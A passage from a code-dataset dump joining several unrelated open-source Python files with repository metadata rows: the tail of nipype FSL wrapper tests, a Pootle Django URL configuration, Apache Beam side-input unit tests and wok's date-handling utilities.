filelist, outdir, cwd, _ = create_files_in_directory()
overlay = fsl.Overlay()
# make sure command gets called
yield assert_equal, overlay.cmd, 'overlay'
# test raising error with mandatory args absent
yield assert_raises, ValueError, overlay.run
# .inputs based parameters setting
overlay.inputs.stat_image = filelist[0]
overlay.inputs.stat_thresh = (2.5, 10)
overlay.inputs.background_image = filelist[1]
overlay.inputs.auto_thresh_bg = True
overlay.inputs.show_negative_stats = True
overlay.inputs.out_file = 'foo_overlay.nii'
yield assert_equal, overlay.cmdline, \
'overlay 1 0 %s -a %s 2.50 10.00 %s -2.50 -10.00 foo_overlay.nii' % (
filelist[1], filelist[0], filelist[0])
# .run based parameter setting
overlay2 = fsl.Overlay(stat_image=filelist[0], stat_thresh=(2.5, 10),
background_image=filelist[1], auto_thresh_bg=True,
out_file='foo2_overlay.nii')
yield assert_equal, overlay2.cmdline, 'overlay 1 0 %s -a %s 2.50 10.00 foo2_overlay.nii' % (
filelist[1], filelist[0])
clean_directory(outdir, cwd)
# test slicer
@skipif(no_fsl)
def test_slicer():
filelist, outdir, cwd, _ = create_files_in_directory()
slicer = fsl.Slicer()
# make sure command gets called
yield assert_equal, slicer.cmd, 'slicer'
# test raising error with mandatory args absent
yield assert_raises, ValueError, slicer.run
# .inputs based parameters setting
slicer.inputs.in_file = filelist[0]
slicer.inputs.image_edges = filelist[1]
slicer.inputs.intensity_range = (10., 20.)
slicer.inputs.all_axial = True
slicer.inputs.image_width = 750
slicer.inputs.out_file = 'foo_bar.png'
yield assert_equal, slicer.cmdline, \
'slicer %s %s -L -i 10.000 20.000 -A 750 foo_bar.png' % (
filelist[0], filelist[1])
# .run based parameter setting
slicer2 = fsl.Slicer(
in_file=filelist[0], middle_slices=True, label_slices=False,
out_file='foo_bar2.png')
yield assert_equal, slicer2.cmdline, 'slicer %s -a foo_bar2.png' % (filelist[0])
clean_directory(outdir, cwd)
def create_parfiles():
np.savetxt('a.par', np.random.rand(6, 3))
np.savetxt('b.par', np.random.rand(6, 3))
return ['a.par', 'b.par']
# test fsl_tsplot
@skipif(no_fsl)
def test_plottimeseries():
filelist, outdir, cwd, _ = create_files_in_directory()
parfiles = create_parfiles()
plotter = fsl.PlotTimeSeries()
# make sure command gets called
yield assert_equal, plotter.cmd, 'fsl_tsplot'
# test raising error with mandatory args absent
yield assert_raises, ValueError, plotter.run
# .inputs based parameters setting
plotter.inputs.in_file = parfiles[0]
plotter.inputs.labels = ['x', 'y', 'z']
plotter.inputs.y_range = (0, 1)
plotter.inputs.title = 'test plot'
plotter.inputs.out_file = 'foo.png'
yield assert_equal, plotter.cmdline, \
('fsl_tsplot -i %s -a x,y,z -o foo.png -t \'test plot\' -u 1 --ymin=0 --ymax=1'
% parfiles[0])
# .run based parameter setting
plotter2 = fsl.PlotTimeSeries(
in_file=parfiles, title='test2 plot', plot_range=(2, 5),
out_file='bar.png')
yield assert_equal, plotter2.cmdline, \
'fsl_tsplot -i %s,%s -o bar.png --start=2 --finish=5 -t \'test2 plot\' -u 1' % tuple(
parfiles)
clean_directory(outdir, cwd)
@skipif(no_fsl)
def test_plotmotionparams():
filelist, outdir, cwd, _ = create_files_in_directory()
parfiles = create_parfiles()
plotter = fsl.PlotMotionParams()
# make sure command gets called
yield assert_equal, plotter.cmd, 'fsl_tsplot'
# test raising error with mandatory args absent
yield assert_raises, ValueError, plotter.run
# .inputs based parameters setting
plotter.inputs.in_file = parfiles[0]
plotter.inputs.in_source = 'fsl'
plotter.inputs.plot_type = 'rotations'
plotter.inputs.out_file = 'foo.png'
yield assert_equal, plotter.cmdline, \
('fsl_tsplot -i %s -o foo.png -t \'MCFLIRT estimated rotations (radians)\' '
'--start=1 --finish=3 -a x,y,z' % parfiles[0])
# .run based parameter setting
plotter2 = fsl.PlotMotionParams(
in_file=parfiles[1], in_source='spm', plot_type='translations',
out_file='bar.png')
yield assert_equal, plotter2.cmdline, \
('fsl_tsplot -i %s -o bar.png -t \'Realign estimated translations (mm)\' '
'--start=1 --finish=3 -a x,y,z' % parfiles[1])
clean_directory(outdir, cwd)
@skipif(no_fsl)
def test_convertxfm():
filelist, outdir, cwd, _ = create_files_in_directory()
cvt = fsl.ConvertXFM()
# make sure command gets called
yield assert_equal, cvt.cmd, "convert_xfm"
# test raising error with mandatory args absent
yield assert_raises, ValueError, cvt.run
# .inputs based parameters setting
cvt.inputs.in_file = filelist[0]
cvt.inputs.invert_xfm = True
cvt.inputs.out_file = "foo.mat"
yield assert_equal, cvt.cmdline, 'convert_xfm -omat foo.mat -inverse %s' % filelist[0]
# constructor based parameter setting
cvt2 = fsl.ConvertXFM(
in_file=filelist[0], in_file2=filelist[1], concat_xfm=True,
out_file="bar.mat")
yield assert_equal, cvt2.cmdline, \
"convert_xfm -omat bar.mat -concat %s %s" % (filelist[1], filelist[0])
clean_directory(outdir, cwd)
@skipif(no_fsl)
def test_swapdims(fsl_output_type=None):
prev_type = set_output_type(fsl_output_type)
files, testdir, origdir, out_ext = create_files_in_directory()
swap = fsl.SwapDimensions()
# Test the underlying command
yield assert_equal, swap.cmd, "fslswapdim"
# Test mandatory args
args = [dict(in_file=files[0]), dict(new_dims=("x", "y", "z"))]
for arg in args:
wontrun = fsl.SwapDimensions(**arg)
yield assert_raises, ValueError, wontrun.run
# Now test a basic command line
swap.inputs.in_file = files[0]
swap.inputs.new_dims = ("x", "y", "z")
yield assert_equal, swap.cmdline, "fslswapdim a.nii x y z %s" % os.path.realpath(os.path.join(testdir, "a_newdims%s" % out_ext))
# Test that we can set an output name
swap.inputs.out_file = "b.nii"
yield assert_equal, swap.cmdline, "fslswapdim a.nii x y z b.nii"
# Clean up
clean_directory(testdir, origdir)
set_output_type(prev_type)
| bsd-3-clause | 3,577,388,417,943,147,000 | 32.006329 | 132 | 0.63768 | false |
mozilla/verbatim | local_apps/pootle_project/urls.py | 6 | 1178 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2008 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with translate; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from django.conf.urls.defaults import *
urlpatterns = patterns('pootle_project.views',
(r'^$|^index.html$', 'projects_index'),
(r'^(?P<project_code>[^/]*)/admin.html$', 'project_admin'),
(r'^(?P<project_code>[^/]*)/permissions.html$', 'project_admin_permissions'),
(r'^(?P<project_code>[^/]*)(/|/index.html)?$', 'project_language_index'),
)
| gpl-2.0 | 5,109,115,047,068,025,000 | 39.62069 | 81 | 0.709677 | false |
amarouni/incubator-beam | sdks/python/apache_beam/transforms/sideinputs_test.py | 9 | 11625 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for side inputs."""
import logging
import unittest
from nose.plugins.attrib import attr
import apache_beam as beam
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that, equal_to
from apache_beam.transforms import window
class SideInputsTest(unittest.TestCase):
# Enable nose tests running in parallel
_multiprocess_can_split_ = True
def create_pipeline(self):
return TestPipeline()
def run_windowed_side_inputs(self, elements, main_window_fn,
side_window_fn=None,
side_input_type=beam.pvalue.AsList,
combine_fn=None,
expected=None):
with self.create_pipeline() as p:
pcoll = p | beam.Create(elements) | beam.Map(
lambda t: window.TimestampedValue(t, t))
main = pcoll | 'WindowMain' >> beam.WindowInto(main_window_fn)
side = pcoll | 'WindowSide' >> beam.WindowInto(
side_window_fn or main_window_fn)
kw = {}
if combine_fn is not None:
side |= beam.CombineGlobally(combine_fn).without_defaults()
kw['default_value'] = 0
elif side_input_type == beam.pvalue.AsDict:
side |= beam.Map(lambda x: ('k%s' % x, 'v%s' % x))
res = main | beam.Map(lambda x, s: (x, s), side_input_type(side, **kw))
if side_input_type in (beam.pvalue.AsIter, beam.pvalue.AsList):
res |= beam.Map(lambda (x, s): (x, sorted(s)))
assert_that(res, equal_to(expected))
def test_global_global_windows(self):
self.run_windowed_side_inputs(
[1, 2, 3],
window.GlobalWindows(),
expected=[(1, [1, 2, 3]), (2, [1, 2, 3]), (3, [1, 2, 3])])
def test_same_fixed_windows(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
expected=[(1, [1, 2]), (2, [1, 2]), (11, [11])])
def test_different_fixed_windows(self):
self.run_windowed_side_inputs(
[1, 2, 11, 21, 31],
window.FixedWindows(10),
window.FixedWindows(20),
expected=[(1, [1, 2, 11]), (2, [1, 2, 11]), (11, [1, 2, 11]),
(21, [21, 31]), (31, [21, 31])])
def test_fixed_global_window(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
window.GlobalWindows(),
expected=[(1, [1, 2, 11]), (2, [1, 2, 11]), (11, [1, 2, 11])])
def test_sliding_windows(self):
self.run_windowed_side_inputs(
[1, 2, 4],
window.SlidingWindows(size=6, period=2),
window.SlidingWindows(size=6, period=2),
expected=[
# Element 1 falls in three windows
(1, [1]), # [-4, 2)
(1, [1, 2]), # [-2, 4)
(1, [1, 2, 4]), # [0, 6)
# as does 2,
(2, [1, 2]), # [-2, 4)
(2, [1, 2, 4]), # [0, 6)
(2, [2, 4]), # [2, 8)
# and 4.
(4, [1, 2, 4]), # [0, 6)
(4, [2, 4]), # [2, 8)
(4, [4]), # [4, 10)
])
def test_windowed_iter(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
side_input_type=beam.pvalue.AsIter,
expected=[(1, [1, 2]), (2, [1, 2]), (11, [11])])
def test_windowed_singleton(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
side_input_type=beam.pvalue.AsSingleton,
combine_fn=sum,
expected=[(1, 3), (2, 3), (11, 11)])
def test_windowed_dict(self):
self.run_windowed_side_inputs(
[1, 2, 11],
window.FixedWindows(10),
side_input_type=beam.pvalue.AsDict,
expected=[
(1, {'k1': 'v1', 'k2': 'v2'}),
(2, {'k1': 'v1', 'k2': 'v2'}),
(11, {'k11': 'v11'}),
])
@attr('ValidatesRunner')
def test_empty_singleton_side_input(self):
pipeline = self.create_pipeline()
pcol = pipeline | 'start' >> beam.Create([1, 2])
side = pipeline | 'side' >> beam.Create([]) # Empty side input.
def my_fn(k, s):
# TODO(robertwb): Should this be an error as in Java?
v = ('empty' if isinstance(s, beam.pvalue.EmptySideInput) else 'full')
return [(k, v)]
result = pcol | 'compute' >> beam.FlatMap(
my_fn, beam.pvalue.AsSingleton(side))
assert_that(result, equal_to([(1, 'empty'), (2, 'empty')]))
pipeline.run()
@attr('ValidatesRunner')
def test_multi_valued_singleton_side_input(self):
pipeline = self.create_pipeline()
pcol = pipeline | 'start' >> beam.Create([1, 2])
side = pipeline | 'side' >> beam.Create([3, 4]) # 2 values in side input.
pcol | 'compute' >> beam.FlatMap( # pylint: disable=expression-not-assigned
lambda x, s: [x * s], beam.pvalue.AsSingleton(side))
with self.assertRaises(Exception):
pipeline.run()
@attr('ValidatesRunner')
def test_default_value_singleton_side_input(self):
pipeline = self.create_pipeline()
pcol = pipeline | 'start' >> beam.Create([1, 2])
side = pipeline | 'side' >> beam.Create([]) # 0 values in side input.
result = pcol | beam.FlatMap(
lambda x, s: [x * s], beam.pvalue.AsSingleton(side, 10))
assert_that(result, equal_to([10, 20]))
pipeline.run()
@attr('ValidatesRunner')
def test_iterable_side_input(self):
pipeline = self.create_pipeline()
pcol = pipeline | 'start' >> beam.Create([1, 2])
side = pipeline | 'side' >> beam.Create([3, 4]) # 2 values in side input.
result = pcol | 'compute' >> beam.FlatMap(
lambda x, s: [x * y for y in s],
beam.pvalue.AsIter(side))
assert_that(result, equal_to([3, 4, 6, 8]))
pipeline.run()
@attr('ValidatesRunner')
def test_as_list_and_as_dict_side_inputs(self):
a_list = [5, 1, 3, 2, 9]
some_pairs = [('crouton', 17), ('supreme', None)]
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_list = pipeline | 'side list' >> beam.Create(a_list)
side_pairs = pipeline | 'side pairs' >> beam.Create(some_pairs)
results = main_input | 'concatenate' >> beam.Map(
lambda x, the_list, the_dict: [x, the_list, the_dict],
beam.pvalue.AsList(side_list), beam.pvalue.AsDict(side_pairs))
def matcher(expected_elem, expected_list, expected_pairs):
def match(actual):
[[actual_elem, actual_list, actual_dict]] = actual
equal_to([expected_elem])([actual_elem])
equal_to(expected_list)(actual_list)
equal_to(expected_pairs)(actual_dict.iteritems())
return match
assert_that(results, matcher(1, a_list, some_pairs))
pipeline.run()
@attr('ValidatesRunner')
def test_as_singleton_without_unique_labels(self):
# This should succeed as calling beam.pvalue.AsSingleton on the same
# PCollection twice with the same defaults will return the same
# view.
a_list = [2]
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_list = pipeline | 'side list' >> beam.Create(a_list)
results = main_input | beam.Map(
lambda x, s1, s2: [x, s1, s2],
beam.pvalue.AsSingleton(side_list), beam.pvalue.AsSingleton(side_list))
def matcher(expected_elem, expected_singleton):
def match(actual):
[[actual_elem, actual_singleton1, actual_singleton2]] = actual
equal_to([expected_elem])([actual_elem])
equal_to([expected_singleton])([actual_singleton1])
equal_to([expected_singleton])([actual_singleton2])
return match
assert_that(results, matcher(1, 2))
pipeline.run()
@attr('ValidatesRunner')
def test_as_singleton_with_different_defaults(self):
a_list = []
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_list = pipeline | 'side list' >> beam.Create(a_list)
results = main_input | beam.Map(
lambda x, s1, s2: [x, s1, s2],
beam.pvalue.AsSingleton(side_list, default_value=2),
beam.pvalue.AsSingleton(side_list, default_value=3))
def matcher(expected_elem, expected_singleton1, expected_singleton2):
def match(actual):
[[actual_elem, actual_singleton1, actual_singleton2]] = actual
equal_to([expected_elem])([actual_elem])
equal_to([expected_singleton1])([actual_singleton1])
equal_to([expected_singleton2])([actual_singleton2])
return match
assert_that(results, matcher(1, 2, 3))
pipeline.run()
@attr('ValidatesRunner')
def test_as_list_twice(self):
# This should succeed as calling beam.pvalue.AsList on the same
# PCollection twice will return the same view.
a_list = [1, 2, 3]
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_list = pipeline | 'side list' >> beam.Create(a_list)
results = main_input | beam.Map(
lambda x, ls1, ls2: [x, ls1, ls2],
beam.pvalue.AsList(side_list), beam.pvalue.AsList(side_list))
def matcher(expected_elem, expected_list):
def match(actual):
[[actual_elem, actual_list1, actual_list2]] = actual
equal_to([expected_elem])([actual_elem])
equal_to(expected_list)(actual_list1)
equal_to(expected_list)(actual_list2)
return match
assert_that(results, matcher(1, [1, 2, 3]))
pipeline.run()
@attr('ValidatesRunner')
def test_as_dict_twice(self):
some_kvs = [('a', 1), ('b', 2)]
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([1])
side_kvs = pipeline | 'side kvs' >> beam.Create(some_kvs)
results = main_input | beam.Map(
lambda x, dct1, dct2: [x, dct1, dct2],
beam.pvalue.AsDict(side_kvs),
beam.pvalue.AsDict(side_kvs))
def matcher(expected_elem, expected_kvs):
def match(actual):
[[actual_elem, actual_dict1, actual_dict2]] = actual
equal_to([expected_elem])([actual_elem])
equal_to(expected_kvs)(actual_dict1.iteritems())
equal_to(expected_kvs)(actual_dict2.iteritems())
return match
assert_that(results, matcher(1, some_kvs))
pipeline.run()
@attr('ValidatesRunner')
def test_flattened_side_input(self):
pipeline = self.create_pipeline()
main_input = pipeline | 'main input' >> beam.Create([None])
side_input = (
pipeline | 'side1' >> beam.Create(['a']),
pipeline | 'side2' >> beam.Create(['b'])) | beam.Flatten()
results = main_input | beam.FlatMap(
lambda _, ab: ab,
beam.pvalue.AsList(side_input))
assert_that(results, equal_to(['a', 'b']))
pipeline.run()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| apache-2.0 | -7,915,734,155,681,565,000 | 36.5 | 80 | 0.601032 | false |
edunham/wok | wok/util.py | 11 | 1471 | import re
from unicodedata import normalize
from datetime import date, time, datetime, timedelta
def chunk(li, n):
"""Yield succesive n-size chunks from l."""
for i in xrange(0, len(li), n):
yield li[i:i+n]
def date_and_times(meta):
date_part = None
time_part = None
if 'date' in meta:
date_part = meta['date']
if 'time' in meta:
time_part = meta['time']
if 'datetime' in meta:
if date_part is None:
if isinstance(meta['datetime'], datetime):
date_part = meta['datetime'].date()
elif isinstance(meta['datetime'], date):
date_part = meta['datetime']
if time_part is None and isinstance(meta['datetime'], datetime):
time_part = meta['datetime'].time()
if isinstance(time_part, int):
seconds = time_part % 60
minutes = (time_part / 60) % 60
hours = (time_part / 3600)
time_part = time(hours, minutes, seconds)
meta['date'] = date_part
meta['time'] = time_part
if date_part is not None and time_part is not None:
meta['datetime'] = datetime(date_part.year, date_part.month,
date_part.day, time_part.hour, time_part.minute,
time_part.second, time_part.microsecond, time_part.tzinfo)
elif date_part is not None:
meta['datetime'] = datetime(date_part.year, date_part.month, date_part.day)
else:
meta['datetime'] = None
| mit | -5,873,701,981,500,842,000 | 29.645833 | 83 | 0.588035 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.